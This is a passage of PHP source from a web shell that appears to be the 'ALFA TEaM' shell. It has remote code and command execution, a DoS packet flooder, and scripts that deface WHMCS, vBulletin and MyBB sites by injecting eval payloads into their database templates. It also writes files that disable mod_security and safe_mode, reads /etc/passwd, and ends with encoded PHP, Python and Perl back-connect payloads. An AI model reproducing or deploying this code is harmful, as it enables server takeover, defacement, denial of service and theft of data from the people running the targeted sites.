
if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';}

$h[1] .= '
';

$h[2] .= "\n";

}

}

echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
';

break;

case 'rename':

@chdir($_POST['c']);

$alfa1_escape = addslashes($_POST["alfa1"]);

$alfa3_escape = addslashes($_POST["alfa3"]);

if(!empty($_POST['alfa3'])){

$cmd_rename = false;

if($chdir_fals&&$alfa_canruncmd){

if(_alfa_is_writable($_POST['alfa1'])){

$alfa1_escape = addslashes($alfa1_decoded);

alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa3'])."'");

}else{

$cmd_rename = true;

}

}else{

$alfa1_escape = addslashes($_POST["alfa1"]);

}

if(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){

echo 'Can\'t rename!
';}else{echo('Renamed!');$alfa1_escape = $alfa3_escape;}

}

echo '
';

break;

case 'touch':

@chdir($_POST['c']);

if( !empty($_POST['alfa3']) ) {

$time = strtotime($_POST['alfa3']);

if($time){

$touched = false;

if($chdir_fals&&$alfa_canruncmd){

    alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa3']))."' '".addslashes($alfa1_decoded)."'");

    $touched = true;

}

if(!@touch($_POST['alfa1'],$time,$time)&&!$touched)

echo 'Fail!';

else

echo 'Touched!';

} else echo 'Bad time format!';

}

clearstatcache();

echo '
';

break;

case 'image':

@chdir($_POST['c']);

echo('
');

$file = $_POST['alfa1'];

$image_info = @getimagesize($file);

if(is_array($image_info)||$chdir_fals){

$width = (int)$image_info[0];

$height = (int)$image_info[1];

if($chdir_fals&&$alfa_canruncmd){

    $source = alfaEx("cat '".addslashes($file)."' | base64");

    list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '".addslashes($file)."'"));

    $mime = explode(":", alfaEx("file --mime-type '".addslashes($file)."'"));

    $image_info['mime'] = $mime[1];

}else{

    $source = __ZW5jb2Rlcg(__read_file($file, false));

}

$image_info_h = "Image type = [ ".$image_info['mime']." ]
Image Size = [ ".$width." x ".$height." ]
";

if($width > 800){$width = 800;}

echo $content = "
".$image_info_h."
'".$file."'

";

}

break;

}

echo '';

alfaFooter();

}

function findicon($file,$type){

$s = 'http://solevisible.com/icons/';

$types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');

if($type!='file'){

return ($file=='..'?$s.'back.png':$s.'folder.png');

}else{

$ext = explode('.',$file);

$ext = end($ext);

$ext = strtolower($ext);

return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');

}

}

function alfadlfile(){

if(isset($_POST['c'],$_POST['file'])){

$basename = rawurldecode(basename($_POST['file']));

$_POST['file'] = str_replace("//", "/", $_POST['c'].'/'.$basename);

$alfa_canruncmd = _alfa_can_runCommand(true,true);

if(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){

ob_start("ob_gzhandler", 4096);

header("Content-Disposition: attachment; filename=\"".addslashes($basename)."\"");

header("Content-Type: application/octet-stream");

if($GLOBALS["glob_chdir_false"]){

    $randname = $basename.rand(111,9999);

    $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);

    $filepath = $scriptpath."/".$randname;

    if(_alfa_is_writable($scriptpath)){

        alfaEx("cp '".addslashes($_POST["file"])."' '".addslashes($filepath)."'");

        readfile($filepath);

        @unlink($filepath);

    }else{

        alfaEx("cat '".addslashes($_POST["file"])."'");

    }

}else{

    readfile($_POST['file']);

}

}else echo('Error...!');}}

function __alfa_set_cookie($key, $value){

    $_COOKIE[$key] = $value;

    @setcookie($key, $value, time()+(86400 * 7), '/');

}

function alfaphpeval(){

if(isset($_COOKIE["eval_tmpdir"])&&@is_dir($_COOKIE["eval_tmpdir"])){

    $tempdir = __ZGVjb2Rlcg($_COOKIE["eval_tmpdir"]);

}else{

    $tempdir = dirname(alfaEx("mktemp"));

    __alfa_set_cookie("eval_tmpdir", __ZW5jb2Rlcg($tempdir));

}

alfahead();

if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){

echo '
';

ob_start();

$INI=ini_get_all();

print ''

.''

.''

.''

.'';

foreach ($INI as $param => $values)

print "\n".''

.''

.''

.''

.'';

$tmp = ob_get_clean();

$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);

$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);

echo str_replace('
';

}

if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {

echo '
';

ob_start();

phpinfo();

$tmp = ob_get_clean();

$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);

$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);

echo str_replace('
';

}

if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {

echo '
';

ob_start();

$EXT=get_loaded_extensions();

echo '
ParamGlobal valueLocal ValueAccess
'.$param.''.$values['global_value'].' '.$values['local_value'].' '.$values['access'].' 
'."\n".'
'.implode('
', $EXT).'
'.count($EXT).' extensions loaded';

echo '

';

}

$lang_html = "";

foreach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= '';}

echo '
| INI_INFO |  | phpinfo | | extensions |

Select Language: 
 '._alfa_load_ace_options("eval").'

'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):"<?php\n\n\techo('hello alfa !');\n\n?>").'
';

echo '
';

if(!empty($_POST['alfa1'])){

if($_POST['alfa3']=="php"){

ob_start();

eval('?>'.$_POST['alfa1']);

$result = htmlspecialchars(ob_get_clean());

}elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){

    $lang = $_POST['alfa3'];

    $filename = "temp".rand(11111,99999);

    $temp = $tempdir."/".$filename ;

    __write_file($filename, $_POST['alfa1']);

    $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");

    @unlink($filename);

    @unlink($temp);

}

echo '';

}

echo '
';

alfafooter();

}

function alfahash(){

if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}

if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i
$stringTools = array(

'Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)',

'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)',

'strrev ( $string )' => 'strrev($s)',

'bin2hex ( $string )' => 'bin2hex($s)',

'hex2bin ( $string )' => 'hex2bin($s)',

'md5 ( $string )' => 'md5($s)',

'sha1 ( $string )' => 'sha1($s)',

'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)',

'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)',

'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)',

'crypt ( $string )' => 'crypt($s)',

'crc32 ( $string )' => 'crc32($s)',

'str_rot13 ( $string )' => 'str_rot13($s)',

'urlencode ( $string )' => 'urlencode($s)',

'urldecode  ( $string )' => 'urldecode($s)',

'full_urlencode  ( $string )' => 'full_urlencode($s)',

'htmlspecialchars  ( $string )' => 'htmlspecialchars($s)',

'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))',

'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))',

'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))',

'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))',

'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))',

'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))',

);

alfahead();

echo '
';

echo "
Method:
  
";

if(!empty($_POST['alfa1'])){

$string = addslashes($_POST['alfa2']);

$string = str_replace('\"','"',$string);

$alg = $_POST['alfa1'];

$code = str_replace('$s',"'".$string."'",$alg);

ob_start();

eval('echo '.$code.';');

$res = ob_get_contents();

ob_end_clean();

if(in_array($alg, $stringTools))echo '';

}

echo "
";

alfaFooter();

}

function alfados(){

alfahead();

echo '
';

echo '
| DOS |
Method :  Host :  Time :  Port :  

';

if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){

echo __pre();

$packets=0;

ignore_user_abort(true);

$exec_time=(int)$_POST['alfa2'];

$time=time();

$max_time=$exec_time+$time;

$host=$_POST['alfa1'];

$port=(int)$_POST['alfa3'];

$method=$_POST['alfa4'];

$out = str_repeat('X',65000);

while(1){

$packets++;

if(time() > $max_time){

break;

}

$fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);

if($fp){

fwrite($fp, $out);

fclose($fp);

}

}

echo "
$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second
";

echo "
";

}

echo '';

alfafooter();

}

function __pre(){return('
');}

function alfaIndexChanger(){

alfahead();



echo '
| Index Changer |
| Whmcs | | vBulletin | | MyBB | 
';

if(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){

echo __pre();



echo "
| Whmcs |



".getConfigHtml('whmcs')."


";

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),

 'td6' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')

);

create_table($table);

echo "
| Your Index |









";

if(isset($_POST['alfa6'])){

$s0levisible="Powered By Solevisible";

$dbu = $_POST['alfa6'];

$path = $_POST['alfa5'];

$fname = $_POST['alfa4'];

$dbn = $_POST['alfa7'];

$dbp = $_POST['alfa8'];

$dbh = $_POST['alfa9'];

$index = $_POST['alfa10'];

$index = str_replace("\'","'",$index);

$deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'"); $solevisible = fopen("'.$fname.'","w"); fwrite($solevisible,$x);';

$saveData = __ZW5jb2Rlcg($deface);

$Def = '{php}eval(base64_decode("'.$saveData.'"));{/php}';

if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){

$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));

$soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");

$soleGet = mysqli_fetch_assoc($soleSave);

$tempSave1 = $soleGet['message'];

$tempSave = str_replace("'","\'",$tempSave1);

$inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";

$result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));

$create = "insert into tblclients (email) values('solevisible@fbi.gov')";

$result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));

if(function_exists('curl_version')){

$AlfaSole = new AlfaCURL(true);

$saveurl = $AlfaSole->Send($path."/pwreset.php");

$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);

$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");

$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";

$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));

__alert('File Created...');

echo "

Click Here !


";

}else{

echo "

Please go to Target \" ".$path."/pwreset.php \"
 and reset password with email => solevisible@fbi.gov
and go to \" ".$path."/".$fname." \"


";

}}}}

if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){

echo __pre();



echo "
| vBulletin |



".getConfigHtml('vb')."
>'); return false;\">

";

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50')

);

create_table($table);

echo "
| Your Index |







";

if($_POST['alfa8']=='>>'){

$s0levisible="Powered By Solevisible";

$dbu = $_POST['alfa2'];

$dbn = $_POST['alfa3'];

$dbp = $_POST['alfa4'];

$dbh = $_POST['alfa5'];

$index = $_POST['alfa6'];

$prefix = $_POST['alfa7'];

$index=str_replace("\'","'",$index);

$set_index = "{\${eval(base64_decode(\'";

$set_index .= __ZW5jb2Rlcg("echo \"$index\";");

$set_index .= "\'))}}{\${exit()}}";

if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){

$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));

$loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";

$loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";

$loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";

@mysqli_query($conn,$loli1) or die (mysqli_error($conn));

@mysqli_query($conn,$loli2) or die (mysqli_error($conn));

@mysqli_query($conn,$loli3) or die (mysqli_error($conn));

__alert('VB index changed...!');

}

}

}

if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) {

echo __pre();



echo "
| Mybb |



".getConfigHtml('mybb')."


";

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')

);

create_table($table);

echo "
| Your Index |




";

if(isset($_POST['alfa6'])){

$mybb_dbh = $_POST['alfa6'];

$mybb_dbu = $_POST['alfa7'];

$mybb_dbn = $_POST['alfa8'];

$mybb_dbp = $_POST['alfa9'];

$mybb_index = $_POST['alfa10'];

if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){

$conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));

$prefix="mybb_";

$loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";

$result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));

__alert('MyBB index changed...!');

}

}

}

echo "
";

alfafooter();

}

function alfaproc()

{

alfahead();

echo "

";

if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))

$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;

if($GLOBALS['sys']=="win"){

$process=array(

"Task List" =>"tasklist /V",

"System Info" =>"systeminfo",

"Active Connections" => "netstat -an",

"Running Services" => "net start",

"User Accounts" => "net user",

"Show Computers" => "net view",

"ARP Table" => "arp -a",

"IP Configuration" => "ipconfig /all"

);}else{

$process=array(

"Process status" => "ps aux",

"Syslog" =>"cat /etc/syslog.conf",

"Resolv" => "cat /etc/resolv.conf",

"Hosts" =>"cat /etc/hosts",

"Cpuinfo"=>"cat /proc/cpuinfo",

"Version"=>"cat /proc/version",

"Sbin"=>"ls -al /usr/sbin",

"Interrupts"=>"cat /proc/interrupts",

"lsattr"=>"lsattr -va",

"Uptime"=>"uptime",

"Fstab" =>"cat /etc/fstab"

);}

foreach($process as $n => $link){

echo ' | '.$n.' | ';

}

echo "

";

if(!empty($_POST['alfa1'])){

echo "
";

if($GLOBALS["glob_chdir_false"]&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."';";}

echo alfaEx($cmd.$_POST['alfa1'], true);

echo '
';

}

echo "
";

alfafooter();

}

function alfasafe(){

alfahead();

echo "

| Auto ByPasser |
";

echo '
| PHP.INI | | .htaccess(apache) | | .htaccess(LiteSpeed) || Read-Passwd | | Read-Users | | Get-User | | Get-Domains | 
';

if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains'){

if(!_alfa_file_exists("/etc/virtual/domainowners")){

echo __pre();

$solevisible9 = _alfa_file('/etc/named.conf');

if(is_array($solevisible9)){

foreach($solevisible9 as $solevisible13){

if(@eregi('zone',$solevisible13)){

preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);

if(strlen(trim($solevisible14[1][0])) > 2){

echo $solevisible14[1][0].'
';

}}}

}

}else{

echo __pre();

$users = _alfa_file("/etc/virtual/domainowners");

if(is_array($users)){

foreach($users as $boz){

$dom = explode(":",$boz);

echo $dom[0]."\n";}}}}

if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases'){

echo '


>\'); return false;" method="post" />
Url:  
';

if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){

if(!_alfa_file_exists("/etc/virtual/domainowners")){

$site = trim($_POST['alfa7']);

$rep = str_replace(array("https://","http://","www."),"",$site);

$user = "";

if(function_exists("posix_getpwuid") && function_exists("fileowner")){

    if($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){

        $user = $user['name'];

    }

}else{

    if(_alfa_can_runCommand(true,true)){

        $user = alfaEx("stat -c '%U' /etc/valiases/".$rep);

    }

}

if(!empty($user)&&$user!='root'){

echo __pre()."
User: {$user}
site: {$rep}
";

}else {echo __pre().'
No such file or directory Or Disable Functions is not NONE...
';}

}else{

$site = trim($_POST['alfa7']);

$rep = str_replace(array("https://","http://","www."),"",$site);

$users = _alfa_file("/etc/virtual/domainowners");

foreach($users as $boz){

$ex = explode(":",$boz);

if($ex[0] == $rep){

echo __pre()."




User: ".trim($ex[1])."


site: {$rep}
";break;}}}}}

if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])){

if(!_alfa_file_exists("/etc/virtual/domainowners")){

echo __pre();

$i = 0;

while ($i < 60000) {

$line = @posix_getpwuid($i);

if (!empty($line)) {

while (list ($key, $vl) = each($line)){

echo $vl."\n";

break;}}$i++;}

}else{echo __pre();

$users = _alfa_file("/etc/virtual/domainowners");

foreach($users as $boz){

$user = explode(":",$boz);

echo trim($user[1]).'
';}}}

if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){

echo __pre();

if(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){

for($uid=0;$uid<60000;$uid++){

$ara = @posix_getpwuid($uid);

if(!empty($ara)){

while(list ($key, $val) = each($ara)){

echo "$val:";

}echo "\n";}}

}else{__alert('failed...');}}

if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){

@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n\nSec------Engine Off\nSec------ScanPOST Off\n");

echo '
htaccess for Apache created...!
';

}

if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){

@__write_file($GLOBALS['cwd']."php.ini","safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");

echo '
 php.ini created...!
';

}

if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){

@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n\nForceType application/x-httpd-php4\n\n\nSecFilterEngine Off\nSecFilterScanPOST Off\n");

echo '
htaccess for Litespeed created...!
';

}

echo "
";

alfafooter();

}

function __get_resource($content){

return @gzinflate(__ZGVjb2Rlcg($content));

}

function __write_file($file, $content){

if($fh = @fopen($file, "wb")){

if(fwrite($fh, $content)!==false) return true;

}

return false;

}

function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){

$res = "[ Success...! ]";

$err = "[ Failed...! ]";

if($evalOptions!="") $evalOptions = $evalOptions." ";

if($evalArguments!="") $evalArguments = " ".$evalArguments;

if($evalType=="c"){

$tmpdir = ALFA_TEMPDIR;

chdir($tmpdir);

if(is_writable($tmpdir)){

$uniq = substr(md5(time()),0,8);

$filename = $evalType.$uniq.".c";

$path = $filename;

if(__write_file($path, $evalCode)){

$ext = ($GLOBALS['sys']=='win')? ".exe":".out";

$pathres = $filename.$ext;

$evalOptions = "-o ".$pathres." ".$evalOptions;

$cmd = "gcc ".$evalOptions.$path;

alfaEx($cmd);

if(is_file($pathres)){

if(chmod($pathres, 0755)){

$cmd = $pathres.$evalArguments;

alfaEx($cmd);

}else{$res = $err;}

unlink($pathres);

}else{$res = $err;}

unlink($path);

}else{$res = $err;}

}

return $res;

}elseif($evalType=="java"){

$tmpdir = ALFA_TEMPDIR;

chdir($tmpdir);

if(is_writable($tmpdir)){

if(preg_match("/class\ ([^{]+){/i",$evalCode, $r)){

$classname = trim($r[1]);

$filename = $classname;

}else{

$uniq = substr(md5(time()),0,8);

$filename = $evalType.$uniq;

$evalCode = "class ".$filename." { ".$evalCode . " } ";

}

$path = $filename.".java";

if(__write_file($path, $evalCode)){

$cmd = "javac ".$evalOptions.$path;

alfaEx($cmd);

$pathres = $filename.".class";

if(is_file($pathres)){

if(chmod($pathres, 0755)){

$cmd = "java ".$filename.$evalArguments;

alfaEx($cmd);

}else{$res = $err;}

unlink($pathres);

}else{$res = $err;}

unlink($path);

}else{$res = $err;}

}

return $res;

}

return false;

}

function alfaconnect(){

alfahead();

$php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";

$python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";

$perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";

